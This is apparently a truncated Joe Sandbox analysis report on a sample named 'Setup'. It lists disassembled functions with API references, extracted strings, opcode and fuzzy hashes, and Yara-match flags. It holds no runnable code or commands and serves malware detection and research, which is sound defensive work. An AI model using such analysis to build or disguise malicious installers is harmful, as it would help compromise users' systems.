Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: !$LiH$PiH
API String ID: 118556049-1169732448
Opcode ID: d4085636677a430a2b278b361d70e92a2aad454a3a29ff43aa0af1643b514362
Instruction ID: 88985983f7bd111c86748e52e06c3dac1df88fffc20864ba6eaaa93475178a18
Opcode Fuzzy Hash: d4085636677a430a2b278b361d70e92a2aad454a3a29ff43aa0af1643b514362
Instruction Fuzzy Hash: 84427B70D012989BDF20EF64C948BEDBBB2AF25304F2042D9D44967291EBB55F89CF61

Function 031C09F3 Relevance: 4.3, Strings: 3, Instructions: 532COMMON

Download Yara Rule

Strings

N, xrefs: 031C1205
array, xrefs: 031C0F66
object, xrefs: 031C1013

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID: N$array$object
API String ID: 0-364997817
Opcode ID: 173bc7df8fb7bc73585e9f6011d84fca5638b073e51d0edf34c0d4332a898b68
Instruction ID: f76bf430b6df3faeca66596cfaaa03fd36fea232a72556d2b38c202baaeb0e79
Opcode Fuzzy Hash: 173bc7df8fb7bc73585e9f6011d84fca5638b073e51d0edf34c0d4332a898b68
Instruction Fuzzy Hash: 8B22E834D1028CEFDB08DBA8C9547EDBB74BF6D300F5441ADD546AB281EB70AA58CB91

Function 031C1793 Relevance: 4.3, Strings: 3, Instructions: 531COMMON

Download Yara Rule

Strings

array, xrefs: 031C1D30
object, xrefs: 031C1DDC
R, xrefs: 031C1FCB

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID: R$array$object
API String ID: 0-1502003704
Opcode ID: fea0684247073fdd53405a8b1245f68e59ddc9226fbf69570706730c21dc17f9
Instruction ID: eddaaa4a0b54caac113476543eccd762d7a37f03b43205f929c6279f12e7eb66
Opcode Fuzzy Hash: fea0684247073fdd53405a8b1245f68e59ddc9226fbf69570706730c21dc17f9
Instruction Fuzzy Hash: CB22C434D1038CDFDB14DBA8C954BEEBBB4AF29300F14856DD456AB281EB746B48CB91

Function 02D5B404 Relevance: 4.1, Strings: 3, Instructions: 335COMMON

Download Yara Rule

Strings

?, xrefs: 02D5B63F
@PI, xrefs: 02D5B444, 02D5B468
D, xrefs: 02D5B7B2

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: ?$@PI$D
API String ID: 0-865519726
Opcode ID: 860aa3514ad5d7a0c712882d6621d68f29c01d353dfd24237edb7b1476158743
Instruction ID: 85766217c139510ddfefb44e51d0894ef35c6bf53c2e7f5bcc4915b385af0f95
Opcode Fuzzy Hash: 860aa3514ad5d7a0c712882d6621d68f29c01d353dfd24237edb7b1476158743
Instruction Fuzzy Hash: 6E025B71C102A8CBDB25DF64CD54BE9B7B0BF59308F1082DAD45867291EBB45AC8CFA1

Function 031D2480 Relevance: 3.7, APIs: 2, Instructions: 710COMMON

Download Yara Rule

APIs

PathMatchSpecA.SHLWAPI(00000000,?), ref: 031D264F
PathMatchSpecA.SHLWAPI(?,?,?,?,?,?,?,?,?,032273F8,00000001,?,?,032273F4,00000003), ref: 031D2ACE

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: MatchPathSpec
String ID:
API String ID: 3588000350-0
Opcode ID: caac3b976b3d4be24f130c0903bde0f07b19f6f2f7b38f112e84fc9a5facea9c
Instruction ID: d894ad68c1c92518317fef6a4fd0862c3f6bb9ac3b5470e5e9cd565a19f267ea
Opcode Fuzzy Hash: caac3b976b3d4be24f130c0903bde0f07b19f6f2f7b38f112e84fc9a5facea9c
Instruction Fuzzy Hash: 3272A970D042689FDB25DF28CC58BEDBBB5AF5A304F0486C9D4286B291DB719B85CF90

Function 02D7A4B4 Relevance: 3.0, Strings: 2, Instructions: 518COMMON

Download Yara Rule

Strings

@, xrefs: 02D7A977
i-8, xrefs: 02D7A73A, 02D7A759

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: @$i-8
API String ID: 0-541822905
Opcode ID: 7bd70de4f725d2b3f87969070b63faebf577a9f97291e896f777f5b1ce171673
Instruction ID: b2edfc24df8587158750fef3daecfc13874919da3df346426ce4dcd6174ae914
Opcode Fuzzy Hash: 7bd70de4f725d2b3f87969070b63faebf577a9f97291e896f777f5b1ce171673
Instruction Fuzzy Hash: 8D1238B29092519FC758DF28C84486FF7E6EFC8314F0A8A1DF899A7350D674ED048B96

Function 031C8CD0 Relevance: 3.0, Strings: 2, Instructions: 518COMMON

Download Yara Rule

Strings

i-8, xrefs: 031C8F56, 031C8F75
@, xrefs: 031C9193

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID: @$i-8
API String ID: 0-541822905
Opcode ID: 7bd70de4f725d2b3f87969070b63faebf577a9f97291e896f777f5b1ce171673
Instruction ID: 57b36d4c09eab732a5e71ba0a56434e86396573297d1b34909dd48512e0cc73d
Opcode Fuzzy Hash: 7bd70de4f725d2b3f87969070b63faebf577a9f97291e896f777f5b1ce171673
Instruction Fuzzy Hash: 78127A769192519FC718CF68C84486FFBE2BFCC314F0A8A1DF989A7250D670E9548B86

Function 02D5D774 Relevance: 3.0, Strings: 1, Instructions: 1732COMMON

Download Yara Rule

Strings

#, xrefs: 02D5F56D

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: #
API String ID: 118556049-1885708031
Opcode ID: 8fdc222a090edcdf4b148e85f071cb733c741723c14d033ba46b431e1382c41d
Instruction ID: 977badbcaba85d4c87aeadfdedd30fe755aa08a261da83576e65da6494c93657
Opcode Fuzzy Hash: 8fdc222a090edcdf4b148e85f071cb733c741723c14d033ba46b431e1382c41d
Instruction Fuzzy Hash: 2D134670D00299CBEB24DF64C958BEDBBB2AF55304F1082D9D0496B291DBB55F88CFA1

Function 02D819E4 Relevance: 2.9, Strings: 1, Instructions: 1686COMMON

Download Yara Rule

Strings

@PI, xrefs: 02D819E4

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: @PI
API String ID: 118556049-979431602
Opcode ID: 8a8a02593a051b1de7d81fc0d658ba111f76dfb43af656b9fdf8fbef12e9f5b8
Instruction ID: 4ab590cd794cb64fcc744f9f0ae7dbc79b58fdb12191117486911fe006c28fb3
Opcode Fuzzy Hash: 8a8a02593a051b1de7d81fc0d658ba111f76dfb43af656b9fdf8fbef12e9f5b8
Instruction Fuzzy Hash: E8134670C052989BDF25EF64C9587EDBBB1AF65304F2082C9D1482B291DBB55F88CFA1

Function 02D86EA4 Relevance: 2.7, Strings: 2, Instructions: 249COMMON

Download Yara Rule

Strings

@PI, xrefs: 02D87151, 02D87146, 02D870DD, 02D86F67, 02D8705B
eH, xrefs: 02D87124, 02D87015

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: @PI$eH
API String ID: 0-1653450276
Opcode ID: 8ae1288b4d5a01eb257e0086f21b5cd9499e3636678bd2dddf56b5a80a52d876
Instruction ID: ab25dcf189a6f353c3851a062ac06f2bd735afee6629fe6325e2184329a228d4
Opcode Fuzzy Hash: 8ae1288b4d5a01eb257e0086f21b5cd9499e3636678bd2dddf56b5a80a52d876
Instruction Fuzzy Hash: D1A1DE74D042959FEB05DFA8C850BFEFBB1AF5A300F284169D8A0AB342D375D945CBA0

Function 02D889B4 Relevance: 2.7, Strings: 2, Instructions: 155COMMON

Download Yara Rule

Strings

@PI, xrefs: 02D88B07, 02D88B71, 02D88B91, 02D88BBB
@PI, xrefs: 02D889D8, 02D88BE7

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: @PI$@PI
API String ID: 0-1786480897
Opcode ID: de021508714e3405e7dec758a9c14c513af9543447fcb0eec2a96904c10a2e17
Instruction ID: d633afe7c7b439822279ba1a8cf3a27cc958de11ffaed33e6afd32e4725736a2
Opcode Fuzzy Hash: de021508714e3405e7dec758a9c14c513af9543447fcb0eec2a96904c10a2e17
Instruction Fuzzy Hash: 40618E718002589BCF20EF64CC88BE9B7B5EF48710F1042D9E549A7290EB706E84CF60

Function 02D7BD6A Relevance: 2.2, Strings: 1, Instructions: 935COMMON

Download Yara Rule

Strings

D, xrefs: 02D7CC06

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: D
API String ID: 118556049-2746444292
Opcode ID: e19a34cf17b40924fe682c6f69858424a03ad7fc9397e5ba07521a90c53c22b4
Instruction ID: aaaef72a92ec6aa72d584cc9353351c5960599e724419ae1cc88260b3938bddb
Opcode Fuzzy Hash: e19a34cf17b40924fe682c6f69858424a03ad7fc9397e5ba07521a90c53c22b4
Instruction Fuzzy Hash: 11A25870D05298DBDF15DF64C9587ECBBB1AF19304F2482D9D4886B281EB785B88CFA1

Function 02D7BD84 Relevance: 2.2, Strings: 1, Instructions: 924COMMON

Download Yara Rule

Strings

D, xrefs: 02D7CC06

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: D
API String ID: 118556049-2746444292
Opcode ID: 6a93caa5a88a7a99f3124ceb436697cdf1f73e43ec87c0e93164a8f0a099397b
Instruction ID: b261cda022c77fbe37e3ccd3c1affa02793bd6f94786f78ea0c0dab63b453bff
Opcode Fuzzy Hash: 6a93caa5a88a7a99f3124ceb436697cdf1f73e43ec87c0e93164a8f0a099397b
Instruction Fuzzy Hash: B7A24870D05298DBDF15DF64C9587ECBBB1AF19304F2482D9D4886B281EB785B88CFA1

Function 02D83C64 Relevance: 2.0, Strings: 1, Instructions: 710COMMON

Download Yara Rule

Strings

@PI, xrefs: 02D8479D, 02D847AF, 02D847DA

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: @PI
API String ID: 0-979431602
Opcode ID: 5b52469ef96194e5b98a25f00978af0b456df2891b37ee0beefe8834e4dcc286
Instruction ID: 57b4040f75aec7580f8c6b192a823c82600efef4fe7c99b2d82d2cb63853d01f
Opcode Fuzzy Hash: 5b52469ef96194e5b98a25f00978af0b456df2891b37ee0beefe8834e4dcc286
Instruction Fuzzy Hash: 4D728770D042689BDB25EF24CC58BEDBBB5EF56304F1082D9D4496B2A1DB719E88CF90

Function 02D77AC4 Relevance: 1.9, APIs: 1, Instructions: 356COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 02D77ED1

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: a7bbe72888ddd785f9ff77edeecdf551ef1efbb7be00b44b2189bebbf25e322f
Instruction ID: 157016f4e13eb171e029736278f476d9ac668bdfd6e10c086491aa3048d9fd7c
Opcode Fuzzy Hash: a7bbe72888ddd785f9ff77edeecdf551ef1efbb7be00b44b2189bebbf25e322f
Instruction Fuzzy Hash: 21E16971D0124ADFDB05CFA8C880AECFBB1BF49310F188669D855EB391E735A945CBA0

Function 031C62E0 Relevance: 1.9, APIs: 1, Instructions: 356COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 031C66ED

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: d01a14a17f9110f6cac68432295bbdcf4fb96d523ca80ef4cb6f5779bc2ea17f
Instruction ID: c00031e3d65f8eade82311342d489b6877d746b16145d4af12a5b490938d4ab2
Opcode Fuzzy Hash: d01a14a17f9110f6cac68432295bbdcf4fb96d523ca80ef4cb6f5779bc2ea17f
Instruction Fuzzy Hash: D1E15571D14699DFCB04CFA8C880AEDFBB4BF5D310F188269E855AB341E731A985CB90

Function 02D76B54 Relevance: 1.9, APIs: 1, Instructions: 352COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 02D76F4F

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 7bebd4828bf2f85323dfc5569ddf47af78ea013615cc1cd2989027e86e5cd2f2
Instruction ID: 674cf7af2ebeedbd4b940a607ea44c7fd09e31e9473074e01f8d3f537f8780a2
Opcode Fuzzy Hash: 7bebd4828bf2f85323dfc5569ddf47af78ea013615cc1cd2989027e86e5cd2f2
Instruction Fuzzy Hash: A5E17871D1164ADFCB04CFA8D880AADFBB5FF49310F188269E855EB391E734A941CB90

Function 031C5370 Relevance: 1.9, APIs: 1, Instructions: 352COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 031C576B

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: c31eacca0782cac41d32f13ef1652b7609883a21509f13a54a92938d4baab015
Instruction ID: e02aed39bd2e0a940fe7521fdd43cd7a4c8843c609de40cecc8756e578897f87
Opcode Fuzzy Hash: c31eacca0782cac41d32f13ef1652b7609883a21509f13a54a92938d4baab015
Instruction Fuzzy Hash: 2CE17B74D1069ADFCB04CFA9D880AADFBB5BF59310F18825DE855EB351E770A981CB80

Function 02D76F64 Relevance: 1.8, APIs: 1, Instructions: 348COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 02D77379

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 2a20d4ec7af371f784a3b2a2c134ae294ba398b07a114db7d9800da1370b060d
Instruction ID: 3aeac08e602c6266844276b0f180047c1397adc6a07945b96895bd971104b932
Opcode Fuzzy Hash: 2a20d4ec7af371f784a3b2a2c134ae294ba398b07a114db7d9800da1370b060d
Instruction Fuzzy Hash: 90E15671D0164ADFDB05CFA8C8806ECFBB1BF59310F18866AE855BB351E734A945CB90

Function 031C5780 Relevance: 1.8, APIs: 1, Instructions: 348COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 031C5B95

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 6dbd0b5d41c382a34177ee3b1c387df1b06029782f7573c25a42e2c5ac8d71a0
Instruction ID: 27a9e89e187a0f4457f43294b3f5650ffc6a2f5f63d554085b7bc17d39d4453b
Opcode Fuzzy Hash: 6dbd0b5d41c382a34177ee3b1c387df1b06029782f7573c25a42e2c5ac8d71a0
Instruction Fuzzy Hash: F6E15671D10689DFCB04CFA9C880AEDFBB5BF5D310F188269E855AB341E731A985CB90

Function 02D77EE4 Relevance: 1.8, APIs: 1, Instructions: 331COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 02D782BB

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 30725ae468e64c3a87f3571974c30ac7485c91846fa9a945474d5f44db2f5290
Instruction ID: f61cb0a824f68bb1a7b094086bb9c78d3d8417e55d511a8fef73083eb98f630f
Opcode Fuzzy Hash: 30725ae468e64c3a87f3571974c30ac7485c91846fa9a945474d5f44db2f5290
Instruction Fuzzy Hash: 28D16771E0565ADFCB04CFA8C884AADFBB1FF49310F148269E855EB381E735A941DB90

Function 031C6700 Relevance: 1.8, APIs: 1, Instructions: 331COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 031C6AD7

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: b9916b3a9e4d47ce9e7732fa82fe678b75c437a1ee10d9c86c81238c9db2bf97
Instruction ID: 3689c41c520f4ea1b319e88171e4ddf0f3a7cce13a4135c78a1c08acd2a46346
Opcode Fuzzy Hash: b9916b3a9e4d47ce9e7732fa82fe678b75c437a1ee10d9c86c81238c9db2bf97
Instruction Fuzzy Hash: 65D16B75E1029ADFCB04CFA8C890AADFBB5BF58310F18826DE455EB341E735A955CB80

Function 02D77384 Relevance: 1.8, APIs: 1, Instructions: 319COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 02D77718

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 6cec23a2c5450889af07fb7122d776d636e171bc93da161823f2ebfb22ec9d8d
Instruction ID: 7e22448d54526b3ddba4d093348923149c5a09acad1756038d5450a8aca8b8c9
Opcode Fuzzy Hash: 6cec23a2c5450889af07fb7122d776d636e171bc93da161823f2ebfb22ec9d8d
Instruction Fuzzy Hash: 76D17771E0468ADFDB05CFA8C8406ACFBB1FF59310F18866AD885EB341E774A955CB90

Function 02D77724 Relevance: 1.8, APIs: 1, Instructions: 319COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 02D77AB8

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 971b5315a3ceffc2db0584a1abd178f7f5bce64f1c7f6760ec4d79e17611e26e
Instruction ID: 82f5c040b8d06dec6c53ca3a1e708674a69d9e2cd7d89599d98be1206896843e
Opcode Fuzzy Hash: 971b5315a3ceffc2db0584a1abd178f7f5bce64f1c7f6760ec4d79e17611e26e
Instruction Fuzzy Hash: 1AD17671E0568ADFDB05CFA8C8406ACFBF1BF49310F18866AD885EB341E774A955CB90

Function 031C5BA0 Relevance: 1.8, APIs: 1, Instructions: 319COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 031C5F34

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 543ba0abd1fdb00140f40689a31579fd633cf9b72f3f1e6e021ca9a657931a30
Instruction ID: 75e5938a1befa376f0439f2f3203cd85f05c912d3fb8ebcca9044776637975db
Opcode Fuzzy Hash: 543ba0abd1fdb00140f40689a31579fd633cf9b72f3f1e6e021ca9a657931a30
Instruction Fuzzy Hash: 61D18871D1068ADFCB04CFA9C8406ADFBB5BF9D310F19825AD841EB341E770A995CB90

Function 031C5F40 Relevance: 1.8, APIs: 1, Instructions: 319COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 031C62D4

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 4e51bfb019a76e3ef0047b7534da10ca373bfa33a0e31e44f734e9b9e2f95696
Instruction ID: 6b13fc2a1a9886d4d90423adcfdc64fa66e8d15683e7c64d7b77ab71050c9901
Opcode Fuzzy Hash: 4e51bfb019a76e3ef0047b7534da10ca373bfa33a0e31e44f734e9b9e2f95696
Instruction Fuzzy Hash: CBD17675D1468ADFCB04CFA8C8406ADFBB5BF9D310F19826AD851EB341E770A991CB90

Function 031A8DE0 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104,?,03235040), ref: 031A8E22

Part of subcall function 031D71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03235040), ref: 031D7297

Part of subcall function 031BB460: Concurrency::cancel_current_task.LIBCPMT ref: 031BB532

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ByteCharConcurrency::cancel_current_taskMultiPathTempWide
String ID:
API String ID: 978242500-0
Opcode ID: f296c4a931d76c0a824a7f72699c8df49fc4ccc6d20e6f9d5a852b77431eaa50
Instruction ID: 040c694461ba5b85632a0b1c9241571835856df64d6f22b1343fa8cf74d7414b
Opcode Fuzzy Hash: f296c4a931d76c0a824a7f72699c8df49fc4ccc6d20e6f9d5a852b77431eaa50
Instruction Fuzzy Hash: 25D16E74D15358EBDB05EB78CA057DD7BB0AF1A308F2082CCE4056B282DBB55B858BD2

Function 02D721D7 Relevance: 1.8, Strings: 1, Instructions: 532COMMON

Download Yara Rule

Strings

N, xrefs: 02D729E9

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: N
API String ID: 0-1130791706
Opcode ID: 58757ba106b21956a6eeddc4af205380699ae7c40982fc24df9ef30f333cd911
Instruction ID: 8e9fb1e0bb87fff38d402e2a317da99ca7557d47d73ff40bd051533b0e965a66
Opcode Fuzzy Hash: 58757ba106b21956a6eeddc4af205380699ae7c40982fc24df9ef30f333cd911
Instruction Fuzzy Hash: 4222C170D042889FCF04DBA4C958BEDBBB5BF25300F508169D942A7781EB786E48CBA1

Function 02D72F77 Relevance: 1.8, Strings: 1, Instructions: 531COMMON

Download Yara Rule

Strings

R, xrefs: 02D737AF

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: R
API String ID: 0-1466425173
Opcode ID: a90d592a102a8f0576e06fefeebdcd72a088291c0db64ace4a3dd1eda32cb3f6
Instruction ID: 9e1429944499dbca64cfd042018f69d371c4ba28af2f0e590b8304033f6c0a9b
Opcode Fuzzy Hash: a90d592a102a8f0576e06fefeebdcd72a088291c0db64ace4a3dd1eda32cb3f6
Instruction Fuzzy Hash: 33229F70D00698DFDF14DBA4C958BEDBBB5EF15300F108599D446A7381EB74AE48CBA1

Function 032079C0 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,032079BB,?,?,00000008,?,?,03211BFF,00000000), ref: 03207BED

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: ca083adec7729de7df8b115516359710cd3500ebc2459ecd2353cc7bc4c85017
Instruction ID: 59b53ae71671939b4b428ca925c190c8cbba5f5d495531b20cbf99de0cfabf98
Opcode Fuzzy Hash: ca083adec7729de7df8b115516359710cd3500ebc2459ecd2353cc7bc4c85017
Instruction Fuzzy Hash: 44B13D312206099FD715CF2CC48AB65BBE0FF45364F298658E999CF2E2C335E995CB40

Function 02D7AD74 Relevance: 1.8, Strings: 1, Instructions: 516COMMON

Download Yara Rule

Strings

@PI, xrefs: 02D7B232, 02D7B249, 02D7B38F

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: @PI
API String ID: 118556049-979431602
Opcode ID: 88c8eb64c07f54aaf9b3649bdffc31d12cca5f976e420dc2a685f28ae98a0ca6
Instruction ID: a2b6df36f2ef70d5f4a236671b690ef3cd64fc10a1503bbf471a12498b7b0653
Opcode Fuzzy Hash: 88c8eb64c07f54aaf9b3649bdffc31d12cca5f976e420dc2a685f28ae98a0ca6
Instruction Fuzzy Hash: 69327D70D012689FDB14DF64C944BEDBBB1AF55308F2482DAD448BB291EBB46E84CF91

Function 031D7BA4 Relevance: 1.7, APIs: 1, Instructions: 241COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 031D7BBA

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: cff5fac4ad9c42e718b7a7895b35d62ecf3062177fa0ccb39492be870ed45f93
Instruction ID: 9ed9a65b69d8304eca23678ec83029788d004c2ab0263f0176851e08187ab8d3
